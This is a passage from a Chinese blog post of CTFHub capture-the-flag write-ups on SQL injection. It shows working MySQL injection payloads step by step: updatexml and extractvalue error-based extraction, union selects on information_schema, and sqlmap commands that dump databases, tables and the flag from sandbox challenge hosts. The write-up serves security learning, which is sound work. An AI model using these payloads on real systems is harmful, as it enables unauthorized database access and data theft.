<h4 id="0x02-wp-1"><a href="#0x02-wp-1" class="headerlink" title="0x02 wp"></a>0x02 wp</h4><p><strong>方法一：手工，UpdateXml报错</strong></p>
<p>输入1，查看sql语句</p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-1.png"></p>
<p>查看有几列，发现测试到3的时候没有回显，语句为<code>1 order by 3 </code>，则表明有两列</p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E5%87%A0%E5%88%97.png"></p>
<p>爆库名、爆表名、爆列名</p>
<p>查看库名<code> 1 and 1=(updatexml(1,concat(0x3a,(select database())),1))</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D.png"></p>
<p>查看表名<code> and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;sqli&#39;)),1))</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E8%A1%A8.png"></p>
<p>查看列名<code>1 and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema=&#39;sqli&#39;)),1))</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-%E5%88%97.png"></p>
<p>查看flag<code>1 and 1=(updatexml(1,concat(0x3a,(select flag from sqli.flag)),1))</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-flag.png"></p>
<p><strong>方法二：手工，ExtractValue报错</strong></p>
<p>查看数据库名<code>1 and extractvalue(1, concat(0x5c, (select database() from information_schema.tables limit 1)));</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-%E8%A1%A8.png"></p>
<p>查看列名<code>1 and extractvalue(1, concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=&#39;sqli&#39; limit 1)))</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-%E5%88%97.png"></p>
<p>查看flag——<code>1 and extractvalue(1, concat(0x5c, (select flag from sqli.flag limit 1)));</code></p>
<p><img src="%E6%8A%A5%E9%94%99-%E6%89%8B%E5%B7%A5-2-flag.png"></p>
<p><strong>方法三：sqlmap</strong></p>
<p>判断数据库类型<code>sqlmap -u http://challenge-7017c1bb485e3630.sandbox.ctfhub.com:10800?id=1</code></p>
<p><img src="%E6%8A%A5%E9%94%99-sqlmap-%E7%B1%BB%E5%9E%8B.png"></p>
<p>查看数据库<code>sqlmap -u http://challenge-7017c1bb485e3630.sandbox.ctfhub.com:10800/?id=1 --dbs</code></p>
<p><img src="%E6%8A%A5%E9%94%99-sqlmap-dbs.png"></p>
<p>查看表名<code>sqlmap -u http://challenge-7017c1bb485e3630.sandbox.ctfhub.com:10800/?id=1 --tables -D sqli</code></p>
<p><img src="%E5%AD%97%E7%AC%A6-sqlmap-tables.png"></p>
<p>查看列名<code>sqlmap -u http://challenge-7017c1bb485e3630.sandbox.ctfhub.com:10800/?id=1 --columns -T flag -D sqli</code></p>
<p><img src="%E6%8A%A5%E9%94%99-sqlmap-tables.png"></p>
<p>查看flag<code>sqlmap -u http://challenge-7017c1bb485e3630.sandbox.ctfhub.com:10800/?id=1 --dump -C flag -T flag -D sqli</code></p>
<p><img src="%E6%8A%A5%E9%94%99-sqlmap-flag.png"></p>
<h3 id="Mysql结构"><a href="#Mysql结构" class="headerlink" title="Mysql结构"></a>Mysql结构</h3><h4 id="0x01-wp-1"><a href="#0x01-wp-1" class="headerlink" title="0x01 wp"></a>0x01 wp</h4><p><strong>方法一：手工</strong></p>
<p>输入1，查看sql语句</p>
<p><img src="%E7%BB%93%E6%9E%84--%E6%89%8B%E5%B7%A5-1.png"></p>
<p>查看有几列，发现测试到3的时候没有回显，语句为<code>1 order by 3 </code>，则表明有两列</p>
<p><img src="%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%87%A0%E5%88%97.png"></p>
<p>查看数据库名<code>-1 union select database(), 2</code></p>
<p><img src="%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%BA%93%E5%90%8D.png"></p>
<p>查看表名<code>-1 union select group_concat(table_name), 1 from information_schema.tables where table_schema=&#39;sqli&#39;</code></p>
<p><img src="%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E8%A1%A8%E5%90%8D.png"></p>
<p>查看列名<code>-1 union select group_concat(column_name), 1 from information_schema.columns where table_name=&#39;nkhetjqrou&#39; </code></p>
<p><img src="%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-%E5%88%97%E5%90%8D.png"></p>
<p>查看具体数据<code>-1 union select 1, jzdejgomhn from sqli.nkhetjqrou</code></p>
<p><img src="%E7%BB%93%E6%9E%84-%E6%89%8B%E5%B7%A5-flag.png"></p>
<p><strong>方法二：sqlmap</strong></p>
<p>和整数型注入的操作相同</p>
<p>判断数据库类型<code>sqlmap -u http://challenge-3c8adb6d3e6e1f78.sandbox.ctfhub.com:10800?id=1</code></p>
<p><img src="%E7%BB%93%E6%9E%84-sqlmap-%E7%B1%BB%E5%9E%8B.png"></p>
<p>查看数据库<code>sqlmap -u http://challenge-3c8adb6d3e6e1f78.sandbox.ctfhub.com:10800?id=1 --dbs</code></p>
<p><img src="%E7%BB%93%E6%9E%84-sqlmap-dbs.png"></p>
<p>查看表名<code>sqlmap -u http://challenge-3c8adb6d3e6e1f78.sandbox.ctfhub.com:10800?id=1 --tables -D sqli</code></p>
<p><img src="%E7%BB%93%E6%9E%84-sqlmap-%E8%A1%A8.png"></p>
<p>查看列名<code>sqlmap -u http://challenge-3c8adb6d3e6e1f78.sandbox.ctfhub.com:10800?id=1 --columns -T nkhetjqrou -D sqli</code></p>
<p><img src="%E7%BB%93%E6%9E%84-sqlmap-%E5%88%97.png"></p>
<p>查看flag<code>sqlmap -u http://challenge-3c8adb6d3e6e1f78.sandbox.ctfhub.com:10800?id=1 --dump -C jzdejgomhn -T nkhetjqrou -D sqli</code></p>
<p><img src="%E7%BB%93%E6%9E%84-sqlmap-flag.png"></p>
<h3 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h3><p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/bc35f8dd4f7c">12种报错注入+万能语句</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Xxy605/article/details/109750292">布尔盲注详细原理讲解</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/83f83f379603">SQL报错注入</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Crrrln
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://example.com/2024/01/16/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%881%EF%BC%89/" title="SQL注入（1）">http://example.com/2024/01/16/CTFHUB-WEB-sql注入（1）/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
              <a href="/tags/%E6%95%B4%E6%95%B0%E5%9E%8B%E6%B3%A8%E5%85%A5/" rel="tag"># 整数型注入</a>
              <a href="/tags/%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5/" rel="tag"># 字符型注入</a>
              <a href="/tags/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" rel="tag"># 报错注入</a>
              <a href="/tags/Mysql%E7%BB%93%E6%9E%84/" rel="tag"># Mysql结构</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/01/08/CTFHUB-WEB-%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-git%E6%B3%84%E9%9C%B2/" rel="prev" title="git泄露">
                  <i class="fa fa-angle-left"></i> git泄露
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/01/24/CTFHUB-WEB-sql%E6%B3%A8%E5%85%A5%EF%BC%882%EF%BC%89/" rel="next" title="SQL注入（2）">
                  SQL注入（2） <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
<!--
-->
  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Crrrln</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">29k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">49 分钟</span>
  </span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
-->

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/4.0.7/pangu.min.js" integrity="sha256-j+yj56cdEY2CwkVtGyz18fNybFGpMGJ8JxG3GSyO2+I=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  






  






<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
